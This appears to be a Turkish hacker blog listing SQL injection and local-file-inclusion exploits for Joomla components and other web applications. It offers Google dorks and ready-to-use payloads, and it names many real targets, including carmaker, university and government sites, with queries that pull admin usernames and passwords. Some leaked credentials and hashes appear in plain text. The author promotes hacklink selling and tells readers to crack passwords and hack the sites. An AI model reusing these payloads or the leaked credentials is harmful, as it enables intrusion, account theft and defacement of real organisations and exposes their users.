Bildiginiz gibi şu sayfamdaki hizmetim hacklink satışı için listeme taze kan lazım oldugu için elimdeki daha önceden shell soktugum sitelerin eklentilerini incelerken farkettigim bir güvenlik açıgıdır, bu güvenlik açıgı, joomla RSfiles eklentisini kullanan sitelerde veritabanına erişmemize ve sitenin tablolarından kolonlarda var olan her türlü bilgiyi okuyabilmemizi saglamaktadır..
arama kodu : com_rsfiles
arama sonuçlarında sitenin sonuna eklenecek kod: index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
Bu kodla sadece db adı ve db versiyonunu ögrenebilirsiniz. geri kalan için kendinizle baş başasınız, herşeyi devletten beklemeyin araştırın biraz yapabilirseniz çekin admin bilgilerini şifrelerini kırın sonrada admin paneline girip istediginizi yapın ister siteyi hackleyin istersenizde hacklink ekleyin okyy . :)
*********************************
# Turkey.
17 Mart 2013 Pazar
Joomla Component RSfiles <= (cid) SQL injection Vulnerability
3 Haziran 2010 Perşembe
Joomla Component com_lead SQL Injection
[TR] Title: Joomla Component com_lead SQL Injection
[TR] Date: 03.06.2010
[TR] Author: ByEge
[TR] Homepage: byege.blogspot.com
[TR] Vendor: http://www.leadya.co.il/
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
[TR] ExploiT :
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
column number : 14
column name : username , password
table name : jos_users
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN
23 Mayıs 2010 Pazar
Webloader v8 SQL Injection Vulnerability
Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.
18 Mayıs 2010 Salı
Webloader Adult Script ( vid ) SQL Injection Vulnerability
Url : http://www.tunuskirtasiye.com.tr/pub/Webloader.txt
Url : http://www.exploit-db.com/exploits/12647
Açıgı Barındıran bir kaç site
http://www.seksizlesene.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://www.fk5.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://www.eftelya.org/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://sikisoteli.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://www.8pornoizle.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://www.koxp.org/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://www.seksizle18.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://www.laqr.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
http://taviz.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre
16 Mayıs 2010 Pazar
Joomla Component com_job LFI Vulnerability
[!] Title: Joomla Component com_job LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
index.php?option=com_job&controller=[LFI]
[!] Example :
http://localhost.free/index.php?option=com_job&controller=../../../../../../etc/passwd
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
Joomla Component com_crowdsource SQL Injection
[!] Title: Joomla Component com_crowdsource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--
[!] Example :
http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
Joomla Component com_resource SQL Injection
BİZE SOSYAL MUHENDİSLİKTEN BASKA BİR BOK BİLMİYORSUNUZ DİYENLERE KAPAK OLSUN
[!] Title: Joomla Component com_resource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]##########################################[+]
[!] Google Dork : inurl:com_resource
[!] ExploiT :
-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--
[!] Example :
http://localhost.free/index.php?option=com_resource&view=single&cid[]=-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--
[+]##########################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
Joomla Component com_comp ( cid ) SQL Injection
[!] Title: Joomla Component com_comp ( cid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--
[!] Example :
http://localhost.free/index.php?option=com_comp&task=view&cid=-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
[!] Ege'nin sözü : En iyi yol, bildigin yoldur.
Joomla Component com_product ( catid ) SQL Injection
[!] Title: Joomla Component com_product ( catid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--
[!] Example :
http://localhost.free/index.php?option=com_product&catid=-24/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
[!] Ege'nin sözü : En iyi yol, bildigin yoldur.
Joomla Component com_doqment ( cid ) SQL Injection
[!] Title: Joomla Component com_doqment ( cid ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
-3/**/uNIOn/**/sELeCt/**/1,2,3,4,5,6,7,8/**/--
[!] Example :
http://localhost.free/index.php?option=com_doqment&cid=-15/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8/**/--
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
[!] Ege'nin sözü : En iyi yol, bildigin yoldur.
Joomla Component com_classifieds ( subcategory ) SQL Injection
[!] Title: Joomla Component com_classifieds ( subcategory ) SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--
[!] Example :
http://localhost.free/index.php?option=com_classifieds&act=providers&task=details&cid=2122&category=0&subcategory=0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
[!] Ege'nin sözü : En iyi yol, bildigin yoldur.
Joomla Component com_product LFI Vulnerability
[!] Title: Joomla Component com_product LFI Vulnerability
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]########################################################################################################################################################[+]
[!] ExploiT :
index.php?option=com_product&controller=[LFI]
[!] Example :
http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd
[+]########################################################################################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
[!] Ege'nin sözü : En iyi yol, bildigin yoldur.
21 Mart 2010 Pazar
Audi - Fiat - Nod32 v.s SQL İnjection
http://www.audi.rs//news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.si/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ua/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ro/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://ro.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://w3.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.sk/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.mk/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.bg/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.hr/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://wwww.audi.hu/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.yu/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://bg.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.rs/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://al.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.ua.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://si.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+ union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.nod32-la.com/isps/deperu/news.php?i=-221 UNION SELECT 1,2,3,4,version(),6,7,8--
http://www.hispanicprwire.com/news.php?l=in&id=-1801 UNION SELECT 1,2,3,concat(User,0x3a,Login,0x3a,Password,0x3a,E_mail),5,6,7,8,9,10 from HPR_Extenal_User
http://500.fiat.bg/news.php?id=-62 UNION SELECT 1,2,concat(ime,0x3a,fam,0x3a,pol,0x3a,nacia,0x3a,city,0x3a,tel,0x3a,mail),4,5,6,7 from users
http://fiat.bg/?id=222&lan=BG&nid=-26 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables
http://www.americanbreweriana.org/news/news_detail.php?selectid=-24 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11--
http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 from users
http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,version(),3,4,5--
http://www.traffictechnologytoday.com/news.php?NewsID=-13388 UNION SELECT 1,2,3,concat(UserName,0x3a,UserPassword),5,6,7,8,9,10 from passenger.Users
http://www.tam.gov.mv/news.php?newsID=-36 UNION SELECT 1,group_concat(username,0x3a,user_password),3,4,5,6 from phpbb_users
19 Mart 2010 Cuma
Mambo com_acstartseite SQL injection..
Google dork : index.php?option=com_acstartseite
http://localhost/index.php?option=com_acstartseite&Itemid=-110 UNION SELECT 1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mos_users--
1 Şubat 2010 Pazartesi
yildiz.edu.tr sql injection
http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=1244 'a ekleyin explorer'in titlesine bakın bir hata oluştu diyor..
http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=-1244 UNION SELECT column degeri vermeyince alttaki gibi bir hata veriyor yani birda SQL İNJECTİON acıgımız var..
SQL de bir hata oluştu. (getNewsFiles function) id = -1244 UNION SELECT
Geri dönmek için lütfen burayı tıklayınız.
Manuel Link : http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=-1244 UNION SELECT null,null,null,null,null,version()--
PHP/4.4.4 version çok ugraştım ama ben bişi yapamadım belki daha iyi anlıyan arkadaşlar yapar..
Gov.tr Sql injection ( Basmıyan Top Olsun )
http://www.trabzonnumune.gov.tr/devam.php?id=550+and+1=2+ UNION SELECT 1,2,3,4,5,6,7,group_concat(dUser,0x3D,dPass),9,10,11 from users
çiçek = 987654
hololu = 987654
celalu = 123456
ekrema = 0000
dr = 1234
dahiliye = 1234
ibrahim = 00061000
25 Ocak 2010 Pazartesi
Citroen.ua Sql İncejtion
http://www.citroen.ua/news/index.php?id=-65 UNION SELECT 1,2,group_concat(Username,0x3D,Password),4,5,6 from site_user
26 Aralık 2009 Cumartesi
SQL injection açıklı siteler
http://www.bote.yildiz.edu.tr/v2/index.php?option=com_mezun&task=edit&hidemainmenu=0&id=-99999 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from jos_users
http://stat.ogu.edu.tr/atalay/index.php?option=com_mezun&task=edit&hidemainmenu=1&id=-601 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from jos_users
http://www.circassiancommunity.com/webroot/cb-newsdetail.php?token=7eab9310c5fb03ed4149c55e3130449b&news_id=-17 UNION SELECT 1,2,admin_login,admin_password,admin_mail,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from cc_admins
http://belediyemdergisi.net/kategori.php?id=-8 UNION SELECT 1,kuladi,3,4,5,ksifre,7 from yonetim
http://www.medyabu.com/haber_detay.php?id=-1250 UNION SELECT 1,2,3,k_adi,sifre,6,7,8,9,10,11,12,13,14 from kullanicilar
http://www.gunisigigazetesi.net/cikti1.php?id=-1 UNION SELECT 1,2,3,4,kullanici_adi,sifre,7,8 from yoneticiler
http://www.psikoturk.net/kategori.php?iid=-16 UNION SELECT 1,login,password,4,5,6,7,8,9,10,11,12,13 from users
http://www.merhaba.info/haberler/devami.php?id=-10967 UNION SELECT 1,2,3,4,5,name,pwd,usr,9,10,11,12,13,14,15,16,17 from logon
http://www.altanplastik.com.tr/haber.php?id=-3 UNION SELECT 1,2,user,pass from users
http://www.cosarkomur.com.tr/duyuru.php?id=-1%20UNION%20SELECT%201,user,3,pass%20from%20users
http://genaygayrimenkul.com/?sayfa=ek_sayfa&id=-11 UNION SELECT 1,2,danisman_sifre,4,danisman_kullanici,6 from emlak_danisman
http://www.bigblue.com.tr/tr/main.php?page=basindan_detay&id=-1 UNION SELECT 1,username,3,4,5,password,7,8,9 from admin
http://www.hrantdink.org/tr/duyuru.php?id=-1 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables
http://www.rahimtarim.com/duyuru.php?id=-89 UNION SELECT 1,2,3,4,5,6,7,admin_password,9,10 from calendar_admin
http://egitimcemberi.com/haber_detay.php?id=-3 UNION SELECT 1,kuladi,3,sifsif,5 from siteuyeleri
http://www.istanbul.edu.tr/itf/ortopedi/yazdir.php?category=tarihce&category_name=Tarihçe&title_id=1&text_id=-1 UNION SELECT 1,2,3,password,email from users
http://www.sohbetagi.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin
http://www.sohbette.in/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin
http://www.ecesohbet.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin
http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6 from mysql.user--
http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,name,pwd))),5,6 from nuke_authors--
http://www.joinvillecultural.sc.gov.br/noticia.php?cd_noticia=-975%20UNION%20SELECT%20nome,senha%20from%20usuario
http://www.camaradc.sc.gov.br/home/noticias.php?id=-169%20%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20admin
http://www.emsetur.se.gov.br/noticias.php?id=-414%20UNION%20SELECT%201,2,senha,login,5%20from%20acesso
http://wanning.hainan.gov.cn/v6/news/news.php?type=qiye_dt&id=-4714%20UNION%20SELECT%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%20c_user
http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2015,1
http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20limit%2018,1
http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20permissao MD5 KIRCAN
http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2025,1
http://www.kimkimdir.gen.tr/yazdir.php?id=-22%20UNION%20SELECT%201,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201,1
telekomun serveri
---------
http://azdavay.meb.gov.tr/haber/ayrinti.php?id=-1+union+select+0,concat(sifre,0x3a,kul_adi),2,3,4,5,6,7,8+from+uyeler
http://www.aliaga.pol.tr/sizdengelenlerayrinti.php?id=-152%20UNION%20SELECT%201,kullaniciadi,sifre%20from%20yonetimkullanicilar
http://www.lakatospal.hu/article_print.php?id=-145%20UNION%20SELECT%201,username,pw,4,5,6,7,8,9,10,11,12,13%20from%20users
http://www.emniyetemlak.com/ayrinti.php?id=-1 UNION SELECT 1,CONVERT(table_name USING latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables limit 17,1
http://salihlirehber.com/rehbercat.php?sayfa=1&category=-5 UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=CHAR(102, 105, 114, 109, 97, 108, 97, 114)
http://www.soma.web.tr/somailan/index.php?catid=-21 UNION SELECT 1,2
http://www.yozgatgazetesi.com/anketler.asp?islemID=101&ID=20+union+select+0+from+
http://www.vidinli.com/elemanilan/ayrinti.php?nopass=1&id=-962 UNION SELECT CONVERT(column_name USING latin1),2,3,4,5,6,7,8,9 from information_schema.columns where table_name=CHAR(101, 104, 99, 112, 119, 105, 107, 105, 95, 117, 115, 101, 114)
http://www.kimacaba.com/ayrinti.php?id=-2897%20UNION%20SELECT%201,column_name,3,4,5,6%20from%20information_schema.columns%20where%20table_name=%27biyografi%27%20limit%201,1
http://www.gal.k12.tr/oku.php?id=-182%20UNION%20SELECT%201,2,3,4,5,6,column_name,8,9,10,11%20from%20information_schema.columns%20where%20table_name=CHAR(97,%20100,%20109,%20105,%20110,%20100,%2097,%20116,%2097)
http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user
http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user
http://www.sanmarenerji.com/TR/urun-detay.php?id=-12 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=CHAR(107, 117, 108, 108, 97, 110, 105, 99, 105) limit 6,1
http://www.opednews.com/populum/link.php?id=-83615%20UNION%20SELECT%201,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables%20limit%2017,1
http://www.yuzeyislem-kumlama.com/haberler.php?id=-162 UNION SELECT 1,2,3,«ê from information_schema.tables limit 17,1
http://www.perdeciler.com/haberler.php?id=-162 UNION SELECT 1,2,3,4,5,6,eposta,pass,9,10,11,12,13 from members
http://clerideslegal.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users
http://theatreantidote.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users
http://www.ogilvy.com.cy/link.php?id=-261%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users
http://skadsillustration.com/prints.php?id=-8 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables limit 17,1
http://www.charlesritchie.com/prints.php?id=-346%20UNION%20SELECT%201,2,group_concat(%20column_name%20),4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_name=CHAR(119,%20112,%2095,%20117,%20115,%20101,%20114,%20115)
http://www.darrencoldwell.com/prints.php?id=-20%20UNION%20SELECT%201,2,3,4,userPWD,6,userName%20from%20ob_users
http://www.artistanncoleman.com/prints.php?action=viewimage&id=-78 UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 17,1
http://www.casino-games-internet.com/ca/new.php?ID=-1741 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables limit 17,1
25 Aralık 2009 Cuma
simcrest.com SQL injection
http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,Adauth),3,4,5,6,7,8 from simcrest_relay.relay_users
admin=7f0274a99146ae15eda88d85c3bf3cb9
http://www.simcrest.com/relay/ panel girişi..
http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,email),3,4,5,6,7,8 from users
redgell=b3ed48555a989b8ee27f613f7b5724dd=redgell@netsuccess.com
JOOMLA com_wcflm SQL injection
Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com
google dork : inurl:com_wcflm
http:/localhost/index.php?option=com_wcflm&task=showList&flmlist_id=2&id= inj code..
http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT password from jos_users--
http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT username from jos_users--